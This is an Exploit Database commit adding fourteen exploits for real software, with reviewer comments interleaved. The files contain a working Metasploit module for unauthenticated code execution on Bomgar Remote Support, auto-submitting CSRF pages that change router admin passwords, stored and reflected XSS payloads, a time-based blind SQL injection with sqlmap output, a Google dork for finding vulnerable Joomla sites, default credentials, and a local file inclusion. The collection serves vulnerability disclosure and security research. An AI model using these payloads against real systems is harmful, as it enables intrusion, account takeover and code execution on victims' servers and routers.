DB: 2016-06-16

14 new exploits

Ultrabenosaurus ChatBoard - Stored XSS
Ultrabenosaurus ChatBoard - CSRF (Send Message)
w2wiki - Multiple XSS Vulnerabilities
Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities
Dokeos 2.2.1 - Blind SQL Injection
Joomla En Masse (com_enmasse) Component 5.1 - 6.4 - SQL Injection
AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation
BookingWizz Booking System < 5.5 - Multiple Vulnerabilities
jbFileManager - Directory Traversal
PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection
Bomgar Remote Support Unauthenticated Code Execution (msf)
Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)
Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)
Google Chrome - GPU Process MailboxManagerImpl Double-Read
Offensive Security 2016-06-16 05:02:53 +00:00
parent 6c005f3b2b
commit 33dd246d8a
15 changed files with 1213 additions and 0 deletions


@ -36125,3 +36125,17 @@ id,file,description,date,author,platform,type,port
39945,platforms/linux/remote/39945.rb,"Apache Continuum Arbitrary Command Execution",2016-06-14,metasploit,linux,remote,8080
39946,platforms/php/webapps/39946.php,"WordPress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80
39947,platforms/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos,0
39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Stored XSS",2016-06-15,HaHwul,php,webapps,80
39949,platforms/php/webapps/39949.html,"Ultrabenosaurus ChatBoard - CSRF (Send Message)",2016-06-15,HaHwul,php,webapps,80
39950,platforms/php/webapps/39950.txt,"w2wiki - Multiple XSS Vulnerabilities",2016-06-15,HaHwul,php,webapps,80
39951,platforms/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,hardware,webapps,80
39952,platforms/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,php,webapps,80
39953,platforms/php/webapps/39953.txt,"Joomla En Masse (com_enmasse) Component 5.1 - 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (msf)",2016-06-15,"Markus Wulftange",linux,remote,443
39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0
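Review bot: the 39952 row records version 2.2.1, but the advisory it indexes (platforms/php/webapps/39952.txt) links dokeos-2.1.1.zip and its PoC URLs use the dokeos-2.1.1 path, so the affected version in this index is unverified; reconcile it with the author before the index is published. The 39951 row also drops the "XSS And CSRF" qualifier that the advisory's own title carries, which hides what the entry covers when the index is searched; prefer the more specific title.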



@ -0,0 +1,100 @@
Hyperoptic (Tilgin) Router HG23xx Multiple XSS And CSRF Vulnerabilities
Vendor: Hyperoptic Ltd. | Tilgin AB
Product web page: http://www.hyperoptic.com
http://www.tilgin.com
Affected version: HG2330, HG2302 and HG2301
Summary: Tilgin's HG23xx family of products offers a flexible and
high capacity product in a tiny form factor. When having the product
in your hands, do not get fooled by its mere size. The product offers
full gigabit routing and a state of the art superior WLAN solution.
It runs all services offered with Tilgin HGA and is prepared for all
foreseeable future services. The product is also offered in an entry
level version with fast Ethernet LAN ports, still with gigabit Ethernet
WAN. The routing capacity and excellent WLAN remains the same also on
this model, the only limit being the fast Ethernet LAN ports.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. XSS issues
were also discovered. The issue is triggered when input passed via multiple
POST and GET parameters are not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: lighttpd/1.4.26-devel-166445
lighttpd/1.4.26-devel-163573
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5329
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5329.php
11.05.2016
--
Default credentials:
--------------------
user/user
admin/admin
admin/abcd2301
XSS PoC:
--------
POST /advanced/firewall_templates/ HTTP/1.1
Host: 192.168.1.1
__form=new&name=test"><script>prompt(1)</script>
Response:
[..snip..]
<INPUT type="hidden" name="name" value="test"><script>prompt(1)</script>">
[..snip..]
CSRF Add Storage (HTTP/SMB) User:
---------------------------------
<html>
<body>
<form action="http://192.168.1.1/storage/users/" method="POST">
<input type="hidden" name="&#95;&#95;form" value="new" />
<input type="hidden" name="name" value="testuser" />
<input type="hidden" name="password" value="testpass" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF Change Admin Password:
---------------------------
<html>
<body>
<form action="http://192.168.1.1/tools/admin_account/" method="POST">
<input type="hidden" name="&#95;&#95;form" value="user" />
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="password" value="NEWPASS" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
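Review bot: the advisory names hardware models (HG2330, HG2302, HG2301) and two lighttpd builds but no firmware version, vendor notification date or fix status; the only date is 11.05.2016. Add those fields so operators can tell whether a current firmware is affected. The response snippet already shows the XSS cause (the name value is echoed into a value attribute unencoded) and the two forms show that state-changing POSTs to /storage/users/ and /tools/admin_account/ are accepted with no anti-forgery token; naming both conditions in the Desc (output encoding on name, a per-session token on those forms) would tell readers what a fix must contain.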

platforms/linux/dos/39961.txt Executable file

@ -0,0 +1,165 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=780
Several functions in the GPU command buffer service interact with the GPU
mailbox manager (gpu/command_buffer/service/mailbox_manager_impl.cc), passing a reference to shared memory as the mailbox argument.
MailboxManagerImpl does not expect this mailbox argument to be malleable in this way, and it is in several places copied and passed to various stl functions, resulting in unexpected behaviour from double-reads when an attacker modifies the mailbox name mid function.
The attached POC uses the GPU command 'ProduceTextureDirectCHROMIUMImmediate' to trigger a use-after-free but other commands that interact with the mailbox manager should also be vulnerable in a similar way.
error::Error GLES2DecoderImpl::HandleProduceTextureDirectCHROMIUMImmediate(
uint32_t immediate_data_size,
const void* cmd_data) {
const gles2::cmds::ProduceTextureDirectCHROMIUMImmediate& c =
*static_cast<const gles2::cmds::ProduceTextureDirectCHROMIUMImmediate*>(
cmd_data);
(void)c;
GLuint texture = c.texture;
GLenum target = static_cast<GLenum>(c.target);
uint32_t data_size;
if (!ComputeDataSize(1, sizeof(GLbyte), 64, &data_size)) {
return error::kOutOfBounds;
}
if (data_size > immediate_data_size) {
return error::kOutOfBounds;
}
// ** mailbox is a pointer into our shared memory buffer **
const GLbyte* mailbox =
GetImmediateDataAs<const GLbyte*>(c, data_size, immediate_data_size);
if (!validators_->texture_bind_target.IsValid(target)) {
LOCAL_SET_GL_ERROR_INVALID_ENUM("glProduceTextureDirectCHROMIUM", target,
"target");
return error::kNoError;
}
if (mailbox == NULL) {
return error::kOutOfBounds;
}
DoProduceTextureDirectCHROMIUM(texture, target, mailbox);
return error::kNoError;
}
void GLES2DecoderImpl::DoProduceTextureDirectCHROMIUM(GLuint client_id,
GLenum target, const GLbyte* data) {
TRACE_EVENT2("gpu", "GLES2DecoderImpl::DoProduceTextureDirectCHROMIUM",
"context", logger_.GetLogPrefix(),
"mailbox[0]", static_cast<unsigned char>(data[0]));
ProduceTextureRef("glProduceTextureDirectCHROMIUM", GetTexture(client_id),
target, data);
}
void GLES2DecoderImpl::ProduceTextureRef(const char* func_name,
TextureRef* texture_ref,
GLenum target,
const GLbyte* data) {
// ** mailbox is still a pointer to shared memory **
const Mailbox& mailbox = *reinterpret_cast<const Mailbox*>(data);
DLOG_IF(ERROR, !mailbox.Verify()) << func_name << " was passed a "
"mailbox that was not generated by "
"GenMailboxCHROMIUM.";
if (!texture_ref) {
LOCAL_SET_GL_ERROR(
GL_INVALID_OPERATION, func_name, "unknown texture for target");
return;
}
Texture* produced = texture_manager()->Produce(texture_ref);
if (!produced) {
LOCAL_SET_GL_ERROR(
GL_INVALID_OPERATION, func_name, "invalid texture");
return;
}
if (produced->target() != target) {
LOCAL_SET_GL_ERROR(
GL_INVALID_OPERATION, func_name, "invalid target");
return;
}
group_->mailbox_manager()->ProduceTexture(mailbox, produced);
}
void MailboxManagerImpl::ProduceTexture(const Mailbox& mailbox,
Texture* texture) {
MailboxToTextureMap::iterator it = mailbox_to_textures_.find(mailbox);
if (it != mailbox_to_textures_.end()) {
if (it->second->first == texture)
return;
TextureToMailboxMap::iterator texture_it = it->second;
mailbox_to_textures_.erase(it);
textures_to_mailboxes_.erase(texture_it);
}
InsertTexture(mailbox, texture);
}
void MailboxManagerImpl::InsertTexture(const Mailbox& mailbox,
Texture* texture) {
texture->SetMailboxManager(this);
TextureToMailboxMap::iterator texture_it =
textures_to_mailboxes_.insert(std::make_pair(texture, mailbox));
// ** modify mailbox at this point **
mailbox_to_textures_.insert(std::make_pair(mailbox, texture_it));
DCHECK_EQ(mailbox_to_textures_.size(), textures_to_mailboxes_.size());
}
We can leverage this for memory corruption in the GPU process by a slightly roundabout route; since each entry in the mailbox_to_textures_ has an iterator to an entry in textures_to_mailboxes_, and it is an expected invariant that both of these entries have the same mailbox name. By starting to create a mailbox named aaaa...aaaa and waiting until the first insert is complete before changing the mailbox name to AAAA...aaaa, then adding a second entry with the same texture reference but with the actual name aaaa...aaaa we get the following situation (example trace through the code from ProduceTexture with InsertTexture call inlined):
// first entry - mailbox.name = 'aaaa...aaaa', texture = t1
MailboxToTextureMap::iterator it = mailbox_to_textures_.find(mailbox);
// if body not executed
if (it != mailbox_to_textures_.end()) {}
texture->SetMailboxManager(this);
TextureToMailboxMap::iterator texture_it =
textures_to_mailboxes_.insert(std::make_pair(texture, mailbox));
// modify - mailbox.name = 'AAAA...aaaa'
mailbox_to_textures_.insert(std::make_pair(mailbox, texture_it));
DCHECK_EQ(mailbox_to_textures_.size(), textures_to_mailboxes_.size());
// mailbox_to_textures_ textures_to_mailboxes_
// AAAA...aaaa, it ------------------------------> aaaa...aaaa, t1
// second entry - mailbox.name = 'aaaa...aaaa', texture = t1
MailboxToTextureMap::iterator it = mailbox_to_textures_.find(mailbox);
// if body not executed (since 'AAAA...aaaa' != 'aaaa...aaaa')
if (it != mailbox_to_textures_.end()) {}
texture->SetMailboxManager(this);
TextureToMailboxMap::iterator texture_it =
textures_to_mailboxes_.insert(std::make_pair(texture, mailbox));
// texture_it is the same as before; since there already exists the pair
// 'aaaa...aaaa', t1* in textures_to_mailboxes, the insert returns an
// iterator to the existing element.
mailbox_to_textures_.insert(std::make_pair(mailbox, texture_it));
DCHECK_EQ(mailbox_to_textures_.size(), textures_to_mailboxes_.size());
// mailbox_to_textures_ textures_to_mailboxes_
// AAAA...aaaa, it ------------------------------> aaaa...aaaa, t1
// aaaa...aaaa, it -----------/
// so both entries in mailbox_to_textures_ have the same iterator.
// third entry - mailbox.name = 'aaaa...aaaa', texture = t2
MailboxToTextureMap::iterator it = mailbox_to_textures_.find(mailbox);
// this time we find an entry
if (it != mailbox_to_textures_.end()) {
// t1 != t2
if (it->second->first == texture)
return;
// so we remove the previous entry for aaaa...aaaa
TextureToMailboxMap::iterator texture_it = it->second;
mailbox_to_textures_.erase(it);
textures_to_mailboxes_.erase(texture_it);
}
// mailbox_to_textures_ textures_to_mailboxes_
// AAAA...aaaa, it ------------------------------> ??
// aaaa...aaaa, it ------------------------------> aaaa...aaaa, t2
Leaving mailbox AAAA...aaaa with a dangling reference to a no-longer valid iterator into textures_to_mailboxes_; (std::map and std::multimap iterators are invalidated by a call to erase() the element that they reference). The attached poc then calls some further methods on the mailbox to trigger a use of the dangling iterator that is detectable by ASAN.
Updated POC to work on the latest asan linux build, command buffer ids were out of date.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39961.zip
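Review bot: the root cause is well described (ProduceTextureRef reinterprets data, a pointer into client shared memory, as a const Mailbox& and InsertTexture then reads that name twice), but the file records no fixed Chromium revision or CVE next to the tracker URL, so readers cannot tell which builds are affected. The remedy implied by the trace is to copy the 64-byte mailbox name out of shared memory into a local Mailbox before the find/insert sequence so both maps see the same key; stating that makes the entry usable for triage. The line "Updated POC to work on the latest asan linux build, command buffer ids were out of date" is a tracker comment pasted into the body and belongs next to the Proof of Concept link.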

platforms/linux/remote/39958.rb Executable file

@ -0,0 +1,253 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize
super(
'Name' => 'Bomgar Remote Support Unauthenticated Code Execution',
'Description' => %q{
This module exploits a vulnerability in the Bomgar Remote Support, which
deserializes user provided data using PHP's `unserialize` method.
By providing an specially crafted PHP serialized object, it is possible
to write arbitrary data to arbitrary files. This effectively allows the
execution of arbitrary PHP code in the context of the Bomgar Remote Support
system user.
To exploit the vulnerability, a valid Logging Session ID (LSID) is required.
It consists of four key-value pairs (i. e., 'h=[...];l=[...];m=[...];t=[...]')
and can be retrieved by an unauthenticated user at the end of the process
of submitting a new issue via the 'Issue Submission' form.
Versions before 15.1.1 are reported to be vulnerable.
},
'Author' =>
[
'Markus Wulftange',
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 5 2015',
'References' =>
[
['CWE', '94'],
['CWE', '502'],
['CVE', '2015-0935'],
['US-CERT-VU', '978652'],
['URL', 'http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html'],
],
'Privileged' => false,
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => [ :echo, :printf ]
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => [ :echo, :printf ]
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true,
'TARGETURI' => '/session_complete',
},
)
register_options(
[
OptString.new('LSID', [true, 'Logging Session ID']),
], self.class
)
end
def check
version = detect_version
if version
print_status("Version #{version} detected")
if version < '15.1.1'
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
print_status("Version could not be detected")
return Exploit::CheckCode::Unknown
end
def exploit
execute_cmdstager
handler
end
def execute_command(cmd, opts)
tmpfile = "/tmp/#{rand_text_alphanumeric(10)}.php"
vprint_status("Uploading payload to #{tmpfile} ...")
upload_php_file(tmpfile, generate_stager_php(cmd))
vprint_status("Triggering payload in #{tmpfile} ...")
execute_php_file(tmpfile)
end
def detect_version
res = send_request_raw(
'uri' => '/'
)
if res and res.code == 200 and res.body.to_s =~ /<!--Product Version: (\d+\.\d+\.\d+)-->/
return $1
end
end
def upload_php_file(filepath, data)
send_pso(generate_upload_file_pso(filepath, data))
end
def execute_php_file(filepath)
send_pso(generate_autoload_pso(filepath))
end
def send_pso(pso)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
'lsid' => datastore['LSID'],
'survey' => pso,
}
)
if res
if res.code != 200
fail_with(Failure::UnexpectedReply, "Unexpected response from server: status code #{res.code}")
end
if res.body.to_s =~ />ERROR: ([^<>]+)</
fail_with(Failure::Unknown, "Error occured: #{$1}")
end
else
fail_with(Failure::Unreachable, "Error connecting to the remote server") unless successful
end
res
end
def generate_stager_php(cmd)
"<?php unlink(__FILE__); passthru('#{cmd.gsub(/[\\']/, '\\\\\&')}');"
end
def generate_upload_file_pso(filepath, data)
log_file = PHPObject.new(
"Log_file",
{
"_filename" => filepath,
"_lineFormat" => "",
"_eol" => data,
"_append" => false,
}
)
logger = PHPObject.new(
"Logger",
{
"\0Logger\0_logs" => [ log_file ]
}
)
tracer = PHPObject.new(
"Tracer",
{
"\0Tracer\0_log" => logger
}
)
serialize(tracer)
end
def generate_autoload_pso(filepath)
object = PHPObject.new(
filepath.chomp('.php').gsub('/', '_'),
{}
)
serialize(object)
end
class PHPObject
attr_reader :name, :members
def initialize(name, members)
@name = name
@members = members
end
end
def serialize(value)
case value.class.name.split('::').last
when 'Array' then serialize_array_numeric(value)
when 'Fixnum' then serialize_integer(value)
when 'Float' then serialize_double(value)
when 'Hash' then serialize_array_assoc(value)
when 'Nil' then serialize_nil
when 'PHPObject' then serialize_object(value)
when 'String' then serialize_string(value)
when 'TrueClass', 'FalseClass' then serialize_boolean(value)
else raise "Value of #{value.class} cannot be serialized"
end
end
def serialize_array_numeric(a)
"a:#{a.size}:{" + a.each_with_index.map { |v, i|
serialize_integer(i) + serialize(v)
}.join + "}"
end
def serialize_array_assoc(h)
"a:#{h.size}:{" + h.each_pair.map { |k, v|
serialize_string(k) + serialize(v)
}.join + "}"
end
def serialize_boolean(b)
"b:#{b ? '1' : '0'};"
end
def serialize_double(f)
"d:#{f};"
end
def serialize_integer(i)
"i:#{i};"
end
def serialize_null
"N;"
end
def serialize_object(o)
"O:#{serialize_string(o.name)[2..-2]}:#{serialize_array_assoc(o.members)[2..-1]}"
end
def serialize_string(s)
"s:#{s.size}:\"#{s}\";"
end
end
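Review bot: send_pso references an undefined local `successful` in its else branch (`fail_with(Failure::Unreachable, "...") unless successful`), so a server that does not answer produces a NameError instead of the intended Unreachable failure; drop the `unless successful`. serialize maps `'Nil'` to `serialize_nil`, but nil's class name is NilClass and the method defined below is serialize_null, so a nil member falls through to the raise; use `when 'NilClass' then serialize_null`. Two smaller points: `version < '15.1.1'` is a string comparison, so a version such as '15.10.0' would be reported as Appears (compare Gem::Version objects instead), and serialize_string emits `s.size` (characters) where PHP's unserialize expects the byte length (`s.bytesize`), which breaks on non-ASCII data.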

platforms/php/webapps/39948.txt Executable file

@ -0,0 +1,28 @@
# Exploit Title: Ultrabenosaurus ChatBoard - Stored XSS
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Point
chat.php is not filtering special character
-> file: ./chat.php
-> param: msg
### Vulnerability Code
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/vul_test/ChatBoard/__original/?chat
Content-Length: 10
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=654<img src="z" onerror=zz>asd
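Review bot: the captured request declares Content-Length: 10 but the body `msg=654<img src="z" onerror=zz>asd` is 34 bytes (longer still if URL-encoded as a browser would send it), so the request as shown would be truncated by the server; either the header or the body was edited after capture and the two should agree. The entry also pins no version or commit for the software (the link is master.zip), so the affected range cannot be checked against a later fix; record the commit tested and the line in chat.php that echoes msg.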


@ -0,0 +1,50 @@
<!--
# Exploit Title: Ultrabenosaurus ChatBoard - CSRF(Send Message)
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Code
-----------------------------------------------------------------------------------------
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://CSRF_NO_REFERE_CHECK
Content-Length: 8
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=CSRF
### Response
-----------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Tue, 14 Jun 2016 01:52:02 GMT
Server: Apache/2.4.10 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
written
-----------------------------------------------------------------------------------------
### Vulnerability Code
-->
<form name="csrf_poc" action="http://127.0.0.1/vul_test/ChatBoard/__original/chat.php" method="POST">
<input type="hidden" name="msg" value="CSRF">
<input type="submit" value="CSRF Attack">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
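Review bot: the captured request carries `X-Requested-With: XMLHttpRequest`, a header a cross-site HTML form post cannot set, so the recorded exchange does not by itself demonstrate the CSRF; the form at the bottom, which sends only `msg`, is the actual evidence that chat.php accepts the write without that header, without a Referer check (the placeholder `http://CSRF_NO_REFERE_CHECK` is misspelled) and without a token, and the entry should say so. The heading "### Vulnerability Code" appears twice; the second should read something like "### PoC".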

platforms/php/webapps/39950.txt Executable file

@ -0,0 +1,32 @@
# Exploit Title: w2wiki - Multiple XSS(Stored/Reflected)
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/panicsteve/w2wiki , http://groups.google.com/group/w2wiki
# Software Link: https://github.com/panicsteve/w2wiki/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability 1 : Stored XSS
POST /vul_test/w2wiki/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/w2wiki/index.php?action=new
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5; W2=dgf6v5tn2ea8uitvk98m2tfjl7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
page=xss&newText=afsd%3Cimg+src%3D%22h%22+onerror%3Dalert%2845%29%3Eaa&action=save
# Vulnerability influence can be found in the wiki. -> script in created page
================================================================================================
### Vulnerability 2 : Reflected XSS
edit page
http://127.0.0.1/vul_test/w2wiki/index.php?action=edit&page="><img src="z" onerror=alert(45)>
search page
http://127.0.0.1/vul_test/w2wiki/index.php?action=search&q="><img src="z" onerror=alert(45)>
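Review bot: the stored-XSS request shows the encoded payload but neither the response nor the template that renders it, and the entry pins no version or commit (only master.zip), so neither the affected range nor the sink (which file echoes newText, and which echoes page and q for the reflected cases) can be confirmed from the text; record the commit tested and the echoing lines. The Cookie header carries two session cookies (PHPSESSID and W2) from the tester's lab and is residue rather than part of the finding.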

platforms/php/webapps/39952.txt Executable file

@ -0,0 +1,38 @@
# Exploit Title: Dokeos Blind SQL Injection
# Date: 2016-06-14
# Exploit Author: Mormoroth
# Exploit Author Blog: http://ha.cker.ir
# Vendor Homepage: http://www.dokeos.com/
# Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
# Version: 2.2.1
# Tested on: Ubuntu
# Twitter : https://twitter.com/Mormoroth
------
Note : hackme.com is localdomain on lab , not a live website
------
VULNERABILITY
curdirpath in slidshow.php is vulnerable to time-based blind sqlinjection
------
POC :
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
Exploiting vulnerability with Sqlmap
Note : to exploit with sqlmap you should use --tamper=between option to retrieve data
------
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
[22:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.12
[22:25:09] [INFO] fetching current database
[22:25:09] [INFO] resumed: dokeos_main
current database: 'dokeos_main'
[22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'
C:\Users\Mort\Desktop\Apps\sqlmap>
------
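Review bot: the header says Version: 2.2.1, but the Software Link downloads dokeos-2.1.1.zip and both PoC URLs use the dokeos-2.1.1 directory, so the tested version is ambiguous; correct one or the other. "slidshow.php" in the VULNERABILITY line is a typo for slideshow.php, the file named in the URLs. The sqlmap line "back-end DBMS: MySQL 5.0.12" reflects the ">= 5.0.12" technique title above it (the floor at which SLEEP() exists) rather than a banner grab, and should not be read as the server's release.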

platforms/php/webapps/39953.txt Executable file

@ -0,0 +1,24 @@
# Exploit Title: Joomla com_enmasse - SQL Injection
# Author: [ Hamed Izadi ]
#IRAN
# Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse
# Category: [ Webapps ]
# Tested on: [ Win ]
# Versions: 5.1-6.4
# Date: 2016/06/15
# Google Dork: inurl:component/enmasse/
# PoC:
# id Parameter Vulnerable To SQL
# Demo:
# http://server/component/enmasse/term?tmpl=component&id=2%27
# Youtube: https://youtu.be/LB5qVnXhzXE
# L u Arg
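Review bot: the entry asserts that the id parameter is injectable but records no response (error text, delay or extracted data) for the `id=2%27` request, so the finding cannot be verified from the file; include the observed response or a parameter summary as the other advisories in this commit do. The trailing line "# L u Arg" is stray text, and the 5.1-6.4 range is given without the vendor's fixed version.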

platforms/php/webapps/39955.txt Executable file

@ -0,0 +1,276 @@
1. ADVISORY INFORMATION
========================================
Title: BookingWizz < 5.5 Multiple Vulnerability
Application: BookingWizz
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: < 5.5
Vendor URL: http://codecanyon.net/item/booking-system/87919
Bugs: Default credentials, CSRF, XXS, SQLi Injection, LFI
Date of Public Advisory: 15 Jun 2016
Author: Mehmet Ince
2. CREDIT
========================================
Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS
Original Advisory:
https://www.mehmetince.net/exploit/bookingwizz-55-multiple-vulnerability
PR1 - Default Administrator Credentials
========================================
File: install.php
People are to lazy to change default credential unless application force
them to do that.
Line 128: <br />Default username/password: <b>admin/pass</b></div>";
PR2 - Cross Site Scripting
========================================
File : eventList.php
// Improper user input validation on
Line 24: $serviceID =
(!empty($_REQUEST["serviceID"]))?strip_tags(str_replace("'","`",$_REQUEST["serviceID"])):getDefaultService();
Line 60: <?php echo SAMPLE_TEXT?> <strong><?php echo VIEW?> <a
href="index.php?serviceID=<?php echo $serviceID?>"><?php echo
CALENDAR?></a></strong>
Payload = 1337" onmouseover="alert(1)
PoC =
http://www.convergine.com/scripts/booking/eventList.php?serviceID=1337%22%20onmouseover=%22alert(1)
PR3 - Local File Inclusion
========================================
File:config.php
Lang variable is under the user control.
Line 31: $lang = (!empty($_REQUEST["lang"])) ? strip_tags(str_replace("'",
"`", $_REQUEST["lang"])) : 'english';
Storing user controlled variable within session variable.
Line 36 - 38 :
if (!empty($_REQUEST["action"]) && $_REQUEST["action"] == "changelang") {
$_SESSION['curr_lang'] = $lang;
}
And using it with include function which cause straightforward file
inclusion.
Line 60 - 68:
$languagePath = MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
if(is_file($languagePath)) {
include MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
}else{
print "ERROR !!! Language file ".$_SESSION['curr_lang'].".lang.php not
found";
exit();
}
PR4 - SQL Injection
========================================
We've seen a lot of potentially SQL Injection vulnerability during code
review.
2 example can be given for this potential points.
File : ajax/checkDeletedServices.php
line 19 - 20:
$bsid = (!empty($_REQUEST["bsid"])) ? $_REQUEST["bsid"] : array();
$type = (!empty($_REQUEST["type"])) ? $_REQUEST["type"] : 'service';
Line 26:
if($type=='service'){
$service = getService($id);
$name = $service['name'];
}
This function executes query with $id parameter which is user input through
checkDeletedServices.php file.
function getService($id, $field=null) {
$sql = "SELECT * FROM bs_services WHERE id='{$id}'";
$res = mysql_query($sql);
if ($field == null) {
return mysql_fetch_assoc($res);
} else {
$row = mysql_fetch_assoc($res);
return $row[$field];
}
}
File : ajax/checkChangeAvailability.php
Line 19 -21
$id = (!empty($_REQUEST["id"])) ? $_REQUEST["id"] : '';
$interval = getServiceSettings($id,'interval');
